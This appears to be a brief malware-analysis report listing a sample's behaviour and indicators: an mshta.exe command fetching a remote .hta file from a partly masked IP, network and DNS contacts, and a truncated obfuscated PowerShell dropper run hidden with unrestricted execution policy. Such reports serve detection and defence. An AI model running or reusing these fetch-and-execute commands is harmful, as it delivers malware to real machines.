Technical Information
- '<SYSTEM32>\mshta.exe' http://45.##8.16.201/b.hta
- '45.##8.16.201':80
- 'gi##ub.com':443
- http://45.##8.16.201/b.hta
- 'gi##ub.com':443
- DNS ASK gi##ub.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function CaFz($tkSGPdShfjUwGGZ, $mBJrjug){[IO.File]::WriteAllBytes($tkSGPdShfjUwGGZ, $mBJrjug)};function zsDPqkpkYeg($tkSGPdShfjUwGGZ){if($tkSGPdShfjUwGGZ.EndsWith...' (with hidden window)